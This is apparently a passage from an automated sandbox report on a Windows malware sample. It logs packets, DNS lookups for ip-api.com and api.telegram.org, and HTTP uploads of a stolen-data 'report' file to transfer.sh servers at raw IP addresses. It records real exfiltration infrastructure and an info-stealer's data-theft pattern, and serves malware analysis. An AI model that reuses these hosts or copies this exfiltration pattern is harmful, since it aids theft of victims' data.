                                                                                                                                                            Dec 8, 2024 13:02:03.420821905 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420852900 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420891047 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420902014 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420912027 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421046972 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421103001 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421180964 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421267986 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421395063 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421458960 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421475887 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.435334921 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.476599932 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.543843985 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.543905973 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.544045925 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.544055939 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.201113939 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.201139927 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.201303959 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:04.201414108 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:04.201977968 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.320868969 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.321219921 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.321302891 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.321546078 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.440834999 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.673583984 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793181896 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793200016 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793297052 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793340921 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793351889 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793399096 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793411970 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793431997 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793452978 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793469906 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793486118 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793495893 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793543100 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793586969 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793601990 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793632030 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793648958 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912849903 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912863016 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912872076 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912879944 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912894964 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912913084 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912931919 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912965059 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.960530043 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.960665941 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.076550007 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.076673985 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.120613098 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.120686054 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.192579031 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.192677021 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.240535021 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.356585026 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.356739998 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.560591936 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.560666084 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.800766945 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.800826073 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:06.048592091 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:06.048664093 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:06.288657904 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:06.288707972 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:06.532557964 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:06.532654047 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:06.776715994 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:06.776774883 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:07.020615101 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:07.020687103 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:07.264606953 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:07.264664888 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:07.504524946 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:07.504606009 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:07.744618893 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:07.744682074 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:07.984688997 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:07.984797955 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:08.228590012 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:08.228674889 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:08.476634979 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:08.476727962 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:08.720555067 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:08.720733881 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:08.962174892 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:08.962239981 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:09.208873987 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:09.209106922 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:09.448575974 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:09.448679924 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:09.688632011 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:09.688705921 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:09.932770967 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:09.932827950 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:10.172595024 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:10.172642946 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:10.412666082 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:10.412720919 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:10.656552076 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:10.656672955 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:10.896593094 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:10.896645069 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:11.136742115 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:11.136804104 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:11.376579046 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:11.376642942 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:11.625454903 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:11.625507116 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:11.870553017 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:11.870624065 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:12.112819910 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:12.116204977 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:12.356822014 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:12.357103109 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:12.596757889 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:12.600215912 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:12.844643116 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:12.844715118 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:13.084588051 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:13.084654093 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:13.324707031 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:13.328263998 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:13.572572947 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:13.572664022 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:13.815196037 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:13.815382004 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:14.057410002 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:14.058001995 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:14.300554991 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:14.300643921 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:14.540534973 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.214760065 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.220017910 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.341361046 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.341545105 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.341589928 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.460944891 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.689224005 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.808746099 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.808835983 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.808895111 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.808906078 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.808912992 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.808923006 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.808959961 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.808968067 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.808983088 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.808995962 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.809005022 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.809012890 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.809026003 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.809075117 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.809284925 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.809334040 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.928360939 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.928428888 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.928519011 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.928529024 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.928539038 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.928548098 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.928575993 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.928613901 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:26.972634077 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:26.972752094 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:27.092199087 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.092278957 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:27.136682987 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.208523989 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.252624989 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.252691984 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:27.314058065 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.314219952 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:27.372148991 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434016943 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434027910 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434036016 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434046030 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434053898 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434061050 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434165001 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434243917 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434384108 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434393883 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434401035 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434535027 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434775114 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434784889 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.434947014 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435024977 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435033083 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435066938 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435158968 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435206890 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435352087 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435360909 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435622931 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.435666084 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.501051903 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.591255903 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:27.642159939 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:28.197559118 CET80804974151.159.4.50192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:28.251661062 CET497418080192.168.2.451.159.4.50
                                                                                                                                                            Dec 8, 2024 13:02:28.339437962 CET49742443192.168.2.4149.154.167.220
                                                                                                                                                            Dec 8, 2024 13:02:28.339466095 CET44349742149.154.167.220192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:28.339554071 CET49742443192.168.2.4149.154.167.220
                                                                                                                                                            Dec 8, 2024 13:02:28.348006010 CET49742443192.168.2.4149.154.167.220
                                                                                                                                                            Dec 8, 2024 13:02:28.348017931 CET44349742149.154.167.220192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:29.715269089 CET44349742149.154.167.220192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:29.715416908 CET49742443192.168.2.4149.154.167.220
                                                                                                                                                            Dec 8, 2024 13:02:29.719862938 CET49742443192.168.2.4149.154.167.220
                                                                                                                                                            Dec 8, 2024 13:02:29.719882011 CET44349742149.154.167.220192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:29.720067978 CET44349742149.154.167.220192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:29.766352892 CET49742443192.168.2.4149.154.167.220
                                                                                                                                                            Dec 8, 2024 13:02:29.807332993 CET44349742149.154.167.220192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:30.267348051 CET44349742149.154.167.220192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:30.267396927 CET44349742149.154.167.220192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:30.267445087 CET49742443192.168.2.4149.154.167.220
                                                                                                                                                            Dec 8, 2024 13:02:30.269283056 CET49742443192.168.2.4149.154.167.220
                                                                                                                                                            Dec 8, 2024 13:02:31.445288897 CET497418080192.168.2.451.159.4.50

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Dec 8, 2024 13:01:54.247562885 CET6324353192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2024 13:01:54.473217964 CET53632431.1.1.1192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:28.200906992 CET6371253192.168.2.41.1.1.1
                                                                                                                                                            Dec 8, 2024 13:02:28.338840961 CET53637121.1.1.1192.168.2.4

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Dec 8, 2024 13:01:54.247562885 CET192.168.2.41.1.1.10xe257Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2024 13:02:28.200906992 CET192.168.2.41.1.1.10xbcf1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Dec 8, 2024 13:01:54.473217964 CET1.1.1.1192.168.2.40xe257No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2024 13:02:28.338840961 CET1.1.1.1192.168.2.40xbcf1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • api.telegram.org
                                                                                                                                                            • ip-api.com

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449730208.95.112.1807496C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2024 13:01:54.690150976 CET85OUTGET /line?fields=query,country HTTP/1.1
                                                                                                                                                            Host: ip-api.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Dec 8, 2024 13:01:55.772556067 CET197INHTTP/1.1 200 OK
                                                                                                                                                            Date: Sun, 08 Dec 2024 12:01:55 GMT
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Content-Length: 27
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Ttl: 60
                                                                                                                                                            X-Rl: 44
                                                                                                                                                            Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                            Data Ascii: United States8.46.123.228


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.449731209.38.221.18480807496C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2024 13:01:56.413141966 CET146OUTPUT /yrABY_user%40841618_report.wsr HTTP/1.1
                                                                                                                                                            Host: 209.38.221.184:8080
                                                                                                                                                            Content-Length: 134658
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Dec 8, 2024 13:01:58.312098026 CET321INHTTP/1.1 500 Internal Server Error
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Server: Transfer.sh HTTP Server
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Made-With: <3 by DutchCoders
                                                                                                                                                            X-Served-By: Proudly served by DutchCoders
                                                                                                                                                            Date: Sun, 08 Dec 2024 12:01:58 GMT
                                                                                                                                                            Content-Length: 24
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a
                                                                                                                                                            Data Ascii: Could not save metadata


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.44973246.235.26.8380807496C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2024 13:01:58.450089931 CET144OUTPUT /yrABY_user%40841618_report.wsr HTTP/1.1
                                                                                                                                                            Host: 46.235.26.83:8080
                                                                                                                                                            Content-Length: 134658
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Dec 8, 2024 13:02:02.196607113 CET321INHTTP/1.1 500 Internal Server Error
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Server: Transfer.sh HTTP Server
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Made-With: <3 by DutchCoders
                                                                                                                                                            X-Served-By: Proudly served by DutchCoders
                                                                                                                                                            Date: Sun, 08 Dec 2024 12:02:02 GMT
                                                                                                                                                            Content-Length: 24
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a
                                                                                                                                                            Data Ascii: Could not save metadata


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.449733147.28.185.29807496C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2024 13:02:02.317780018 CET140OUTPUT /yrABY_user%40841618_report.wsr HTTP/1.1
                                                                                                                                                            Host: 147.28.185.29
                                                                                                                                                            Content-Length: 134658
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Dec 8, 2024 13:02:02.673619986 CET12360OUTData Raw: 57 53 52 24 8b 2b 05 10 42 29 90 6d 18 d4 8d ab c2 0e b6 4a 2d 09 c4 71 b4 60 73 bc 6d 50 5b 0e 17 f4 eb 46 7b b9 ef 19 2d d1 30 61 cc be ac 2c 0a 83 b7 ca e3 e1 d5 ef 90 f8 95 06 81 0c d3 96 a7 94 03 4f 94 c7 c2 ae 9e a0 c2 1c e1 19 56 e6 8e 7e
                                                                                                                                                            Data Ascii: WSR$+B)mJ-q`smP[F{-0a,OV~U9-rs>u1Om8=/MWhH.xa="`cT'm!/VKN!L+XZ[2!-KpZ.h+ yZV{`<nffp\#
                                                                                                                                                            Dec 8, 2024 13:02:02.793587923 CET2472OUTData Raw: 4e 0e 56 dd 7d a7 6f c5 5e cc cb 8c 61 d8 46 85 96 3c 2e 40 47 d4 46 9a 18 d3 ad 26 5a cb d6 1e 1c 32 52 23 cb c5 13 e4 52 10 e4 e5 8f 47 d7 ed 78 98 e2 86 2d 50 70 ed 35 f7 1a 62 9d d3 c9 86 d2 6d 51 a9 89 7e 04 90 b8 3d 0f 10 ce 5b 43 5c 32 62
                                                                                                                                                            Data Ascii: NV}o^aF<.@GF&Z2R#RGx-Pp5bmQ~=[C\2b?AX2t$1;vvhpDzpsxhknk.nc?O)nde742?s~a vIh_h%E+fc,o)!xCT+fGj&iO
